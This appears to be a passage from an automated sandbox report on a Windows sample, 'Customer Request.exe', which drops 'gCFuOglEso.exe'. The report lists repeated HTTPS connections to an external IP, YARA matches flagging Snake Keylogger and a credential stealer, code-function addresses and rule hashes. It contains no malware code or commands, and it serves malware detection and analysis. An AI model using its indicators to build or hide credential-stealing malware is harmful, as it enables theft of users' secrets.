                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50014 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50024 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50087 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50088 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50089 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50090 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50092 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50093 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50094 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50095 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50096 version: TLS 1.2
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeWindow created: window name: CLIPBRDWNDCLASS

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: sslproxydump.pcap, type: PCAPMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 10.2.Customer Request.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000000F.00000002.2710539876.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000000A.00000002.2710969497.0000000003152000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  .NET source code contains very large strings
                  Source: Customer Request.exe, Form4.csLong String: Length: 169248
                  Source: gCFuOglEso.exe.0.dr, Form4.csLong String: Length: 169248
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_0101E0440_2_0101E044
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_05AF85880_2_05AF8588
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_05AF00060_2_05AF0006
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_05AF00400_2_05AF0040
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_05AFB9030_2_05AFB903
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074A51700_2_074A5170
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074A0A200_2_074A0A20
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074AC7400_2_074AC740
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074A54510_2_074A5451
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074A54600_2_074A5460
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074AC3080_2_074AC308
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074A51600_2_074A5160
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074A41DF0_2_074A41DF
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074A41F00_2_074A41F0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074A41B90_2_074A41B9
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074ADF400_2_074ADF40
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074ABED00_2_074ABED0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074A2BF80_2_074A2BF8
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074A0A100_2_074A0A10
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_074ABA980_2_074ABA98
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_08E70A800_2_08E70A80
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_08E7F0A90_2_08E7F0A9
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 0_2_08E70A700_2_08E70A70
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012C610810_2_012C6108
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012CC19010_2_012CC190
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012C358110_2_012C3581
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012CC47910_2_012CC479
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012CB4FD10_2_012CB4FD
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012CC75D10_2_012CC75D
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012C688010_2_012C6880
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012CBBE110_2_012CBBE1
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012CCA3110_2_012CCA31
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012C4AE510_2_012C4AE5
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_012CBEB010_2_012CBEB0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560544010_2_05605440
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560C73810_2_0560C738
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560C01010_2_0560C010
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_056042C010_2_056042C0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_05602F7810_2_05602F78
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_05607AF010_2_05607AF0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560247810_2_05602478
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560543010_2_05605430
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560F76810_2_0560F768
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560F75810_2_0560F758
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560472010_2_05604720
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560471010_2_05604710
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560B66810_2_0560B668
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560B65810_2_0560B658
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560C6D110_2_0560C6D1
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_0560C01210_2_0560C012
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_056042B010_2_056042B0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_05602F6810_2_05602F68
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_05604FE010_2_05604FE0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_05604FD010_2_05604FD0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_05604B7B10_2_05604B7B
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_05604B8010_2_05604B80
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_05607AE110_2_05607AE1
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C9C6B010_2_06C9C6B0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C9853010_2_06C98530
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C9C6A110_2_06C9C6A1
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C9941810_2_06C99418
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C92AB010_2_06C92AB0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_07242E7410_2_07242E74
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_072455D810_2_072455D8
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_07243BC010_2_07243BC0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_07243BD010_2_07243BD0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_00B7E04411_2_00B7E044
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_0506858811_2_05068588
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_0506000611_2_05060006
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_0506004011_2_05060040
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_0506B8F811_2_0506B8F8
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0517011_2_06D05170
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D00A2011_2_06D00A20
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0C74011_2_06D0C740
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0545311_2_06D05453
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0546011_2_06D05460
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0C30811_2_06D0C308
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D041F011_2_06D041F0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D041EB11_2_06D041EB
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D041BB11_2_06D041BB
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0516011_2_06D05160
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0BED011_2_06D0BED0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0DF4011_2_06D0DF40
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D02C0311_2_06D02C03
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D0BA9811_2_06D0BA98
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_06D00A1011_2_06D00A10
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_083B0A8011_2_083B0A80
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_083BF0B311_2_083BF0B3
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_083B0A7011_2_083B0A70
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_05068ADB11_2_05068ADB
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_05068AE811_2_05068AE8
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029AB32815_2_029AB328
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029AC19015_2_029AC190
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029A610815_2_029A6108
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029A673015_2_029A6730
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029AC75115_2_029AC751
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029AC47015_2_029AC470
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029A4AD915_2_029A4AD9
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029ACA3115_2_029ACA31
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029ABBD315_2_029ABBD3
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029A985815_2_029A9858
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029ABEB015_2_029ABEB0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029AB4F315_2_029AB4F3
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_029A357015_2_029A3570
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_06E3458815_2_06E34588
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_06E33BC015_2_06E33BC0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_06E33BD015_2_06E33BD0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 15_2_06E353A815_2_06E353A8
                  Source: Customer Request.exeStatic PE information: invalid certificate
                  Source: Customer Request.exe, 00000000.00000002.1484012977.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Customer Request.exe
                  Source: Customer Request.exe, 00000000.00000002.1490920950.0000000003A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Customer Request.exe
                  Source: Customer Request.exe, 00000000.00000000.1446331231.0000000000796000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerqSA.exeF vs Customer Request.exe
                  Source: Customer Request.exe, 00000000.00000002.1487696864.0000000002CAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Customer Request.exe
                  Source: Customer Request.exe, 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Customer Request.exe
                  Source: Customer Request.exe, 00000000.00000002.1490920950.000000000431E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Customer Request.exe
                  Source: Customer Request.exe, 00000000.00000002.1503031924.000000000B670000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Customer Request.exe
                  Source: Customer Request.exe, 00000000.00000002.1501024869.0000000007460000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Customer Request.exe
                  Source: Customer Request.exe, 0000000A.00000002.2745847494.0000000006EC9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Customer Request.exe
                  Source: Customer Request.exeBinary or memory string: OriginalFilenamerqSA.exeF vs Customer Request.exe
                  Source: Customer Request.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: sslproxydump.pcap, type: PCAPMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 10.2.Customer Request.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
